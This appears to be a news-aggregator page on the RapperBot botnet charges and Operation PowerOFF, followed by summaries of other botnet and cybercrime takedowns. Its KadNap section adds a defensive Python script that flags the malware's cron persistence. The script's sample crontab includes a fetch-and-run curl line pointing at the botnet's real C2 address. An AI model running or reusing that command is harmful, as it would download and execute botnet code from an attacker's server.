
RapperBot Botnet Administrator Charged in the U.S.

2 unique sources, 3 articles

Summary


The RapperBot botnet, operated by Ethan Foltz, has been disrupted as part of the broader international Operation PowerOFF, which has now identified over 75,000 DDoS-for-hire users and taken down 53 domains across 21 countries. The operation, supported by Europol, has arrested four individuals, dismantled illegal booter services, and is transitioning into a prevention phase to curb future misuse. RapperBot has been responsible for over 370,000 DDoS attacks on victims in over 80 countries since 2021, primarily targeting U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet, also known as Eleven Eleven Botnet and CowBot, infected DVRs and Wi-Fi routers to launch attacks and mine Monero. Foltz was charged with aiding and abetting computer intrusions, and the botnet’s command-and-control infrastructure was seized in August 2025. The botnet added a cryptomining module in 2023 and conducted attacks ranging from several terabits per second to over 1 billion packets per second, with the largest exceeding 6 Tbps. Operation PowerOFF’s latest actions build on prior phases that dismantled key infrastructure and seized databases with over 3 million criminal accounts.

Timeline

  1. 20.08.2025 07:19 (3 articles)

    RapperBot botnet administrator charged in the U.S.

    The botnet targeted U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet added a cryptomining module in 2023 to diversify its revenue stream. The attacks ranged from several terabits per second to over 1 billion packets per second (pps), with the largest attack exceeding 6 Tbps. The botnet has not shown any signs of resurgence in malicious activity following the seizure of its infrastructure on August 6, 2025. Operation PowerOFF, an international effort to dismantle DDoS-for-hire infrastructures, has identified over 75,000 DDoS-for-hire users during its latest phase, leading to the arrest of four individuals, the takedown of 53 domains, and the issuance of 25 search warrants. The operation disrupted illegal booter services by dismantling technical infrastructure and is transitioning into a prevention phase, including awareness campaigns, search engine ad placements targeting young people seeking DDoS tools, removal of over 100 URLs promoting illegal services, and on-chain warning messages tied to illicit payments.


Similar Happenings

Takedown of fraudulent CSAM distribution scam platform "Alice with Violence CP"

An international Europol-backed law enforcement operation, codenamed Operation Alice, dismantled the fraudulent dark web platform "Alice with Violence CP" and over 373,000 related sites advertising fake child sexual abuse material (CSAM) and cybercrime-as-a-service (CaaS) offerings. The takedown ran from March 9–19, 2026, and involved 22 countries, including Germany, the US, UK, and Ukraine. The platform, operated by a 35-year-old Chinese national, defrauded approximately 10,000 victims into paying between €17 and €215 in Bitcoin, extracting an estimated €345,000 ($396,000) over a six-year period (2019–2025). The scam advertised both non-existent CSAM packages and CaaS services such as stolen card data and access to compromised systems. Authorities identified 440 users in 23 countries, with over 100 under investigation for attempted CSAM purchase. Seized infrastructure included 287 servers, 105 of which were located in Germany. An international arrest warrant has been issued for the operator. The operation follows other major takedowns, including the 2024 Kidflix CSAM platform disruption, highlighting continued cross-border efforts against online child exploitation.

SocksEscort Proxy Network Disrupted by Law Enforcement

Law enforcement agencies in the U.S. and Europe, along with private partners, have disrupted the SocksEscort cybercrime proxy network. This network relied on edge devices compromised by the AVRecon malware for Linux. The disruption involved taking down multiple servers and domains, freezing cryptocurrency, and disconnecting infected devices. The network had been active for over a decade, offering access to 'clean' IP addresses from major ISPs and facilitating various fraudulent activities. The SocksEscort network had an average of 20,000 infected devices weekly and was used in several high-value fraud cases, including the theft of $1 million in cryptocurrency and losses of $700,000 from a Pennsylvania-based manufacturing business. The network offered access to about 369,000 different IP addresses in 163 countries since summer 2020, with the service listing nearly 8,000 infected routers as of February 2026. The compromised devices were infected through a vulnerability in the residential modems of a specific brand. International law enforcement partners executed Operation Lightning to dismantle the SocksEscort proxy service, which compromised over 360,000 routers and IoT devices in 163 countries since 2020. The operation involved seizing 34 domains and 23 servers in seven countries, freezing $3.5 million in cryptocurrency, and disconnecting all infected devices. The malware enabled various criminal activities, including ransomware, DDoS attacks, and the distribution of child sexual abuse material (CSAM). The payment platform for SocksEscort received almost $6 million from proxy service customers.

KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

A new botnet named KadNap targets ASUS routers and other edge networking devices, turning them into proxies for malicious traffic. Since August 2025, it has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia Distributed Hash Table (DHT) protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Most infected devices are located in the United States (60%), followed by Taiwan, Hong Kong, and Russia. The infection begins with a malicious script that downloads an ELF binary, establishing persistence via a cron job. The botnet uses NTP servers for time synchronization and a modified Kademlia protocol for communication, making it difficult to identify and disrupt the command-and-control (C2) infrastructure. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet. KadNap malware uses a shell script (aic.sh) downloaded from the C2 server (212.104.141[.]140) to initiate the process of conscripting the victim to the P2P network. The malware creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter, and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.
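The persistence mechanism described above (an hourly cron job at the 55-minute mark that fetches aic.sh from 212.104.141[.]140, renames it to .asusrouter, and later drops a binary named kad) can be turned into a simple host-side check. The script below is an added example written for this page, not Lumen's tooling or any published KadNap detection; the crontab lines it scans are constructed samples, and the exact fetch command in the sample is an assumption, since the summary does not quote it. It parses standard five-field crontab entries and reports any entry that matches at least two of the indicators, so the schedule alone (which many legitimate jobs share) does not produce a hit.

```python
"""Flag crontab entries that match the KadNap persistence pattern from the summary.

Added example for this page; not part of any vendor's tooling. The indicators
(the 55-minute hourly schedule, the aic.sh script, the .asusrouter rename, the
kad binary, and the C2 address 212.104.141[.]140) are taken from the summary.
The crontab text below is a constructed sample, not a capture from a device.
"""
import re

# Defanged on the page as 212.104.141[.]140
C2_HOST = "212.104.141.140"

# Each indicator is (name, predicate over a parsed crontab entry).
INDICATORS = [
    ("c2_host", lambda e: C2_HOST in e["command"]),
    ("script_name", lambda e: "aic.sh" in e["command"]),
    ("rename_asusrouter", lambda e: ".asusrouter" in e["command"]),
    ("kad_binary", lambda e: re.search(r"(^|[\s/])kad(\s|$)", e["command"]) is not None),
    ("hourly_at_55", lambda e: e["minute"] == "55" and e["hour"] == "*"),
]

# Five schedule fields followed by the command.
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


def parse_crontab(text):
    """Return a list of entry dicts, skipping blanks, comments and malformed lines."""
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = CRON_RE.match(stripped)
        if not m:
            continue
        minute, hour, dom, month, dow, command = m.groups()
        entries.append({
            "minute": minute, "hour": hour, "dom": dom, "month": month,
            "dow": dow, "command": command, "raw": stripped,
        })
    return entries


def score_entry(entry):
    """Names of the indicators that this entry matches, in INDICATORS order."""
    return [name for name, pred in INDICATORS if pred(entry)]


def find_suspicious(text, min_hits=2):
    """(raw_line, matched_indicators) for entries with at least min_hits matches."""
    findings = []
    for entry in parse_crontab(text):
        hits = score_entry(entry)
        if len(hits) >= min_hits:
            findings.append((entry["raw"], hits))
    return findings


# Constructed sample: two benign jobs, one benign job that only shares the
# schedule, and one line modelled on the described KadNap fetch-and-run job.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * /usr/local/bin/backup.sh
55 * * * * curl -s http://212.104.141.140/aic.sh -o /tmp/.asusrouter && sh /tmp/.asusrouter
30 3 * * * /usr/bin/find /tmp -mtime +7 -delete
"""

if __name__ == "__main__":
    for raw, hits in find_suspicious(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS [{', '.join(hits)}]: {raw}")
```

On a real device the input would be the contents of the root crontab (or the cron spool directory); the threshold of two indicators is the design choice that keeps `/usr/local/bin/backup.sh` out of the findings even though it runs at the same minute as the described job.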

International Law Enforcement Disrupts Rhadamanthys, VenomRAT, and Elysium Malware Operations

Law enforcement agencies from 11 countries, coordinated by Europol and Eurojust, disrupted operations of Rhadamanthys infostealer, VenomRAT, and Elysium botnet malware as part of Operation Endgame 3.0. The action, which occurred between November 10 and 13, 2025, involved seizing over 1,000 servers and 20 domains, arresting a key suspect in Greece, and uncovering millions of stolen credentials. The operation also involved multiple private cybersecurity partners. The dismantled infrastructure included hundreds of thousands of infected computers, with the main suspect behind Rhadamanthys having access to over 100,000 crypto wallets worth millions of euros. Victims were often unaware of their systems' infections. The latest version of Rhadamanthys added support for collecting device and web browser fingerprints, along with incorporating several mechanisms to fly under the radar. Additionally, the Dutch police seized around 250 physical servers and thousands of virtual servers used by a bulletproof hosting service, which has been involved in over 80 cybercrime investigations since 2022. The seized servers were located in data centers in The Hague and Zoetermeer.

RondoDox botnet exploits 56 n-day vulnerabilities in global attacks

The RondoDox botnet has been actively exploiting over 50 vulnerabilities across more than 30 vendors since May 2025. The botnet uses an 'exploit shotgun' strategy to maximize infections, targeting both older and more recent vulnerabilities. The list of exploited vulnerabilities includes CVE-2023-1389, a flaw in the TP-Link Archer AX21 Wi-Fi router, and others demonstrated at Pwn2Own events. In January 2026, the botnet was identified targeting the critical HPE OneView vulnerability CVE-2025-37164, with over 40,000 attack attempts recorded on 7 January. The vulnerability, which has a CVSS 3.1 score of 10 (critical), was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. The botnet's activity poses significant risks, especially for devices that have reached end-of-life and are more likely to remain unpatched. Many users also tend to ignore firmware updates for supported hardware, increasing the risk of exploitation. The botnet targets 35 to 40 vulnerabilities found in consumer-oriented devices, which are often unmanaged and rarely updated. The botnet's impact scale is potentially quite large, though not yet fully known. To mitigate the threat, users are advised to apply the latest firmware updates, replace end-of-life equipment, segment their networks, and use strong, unique passwords.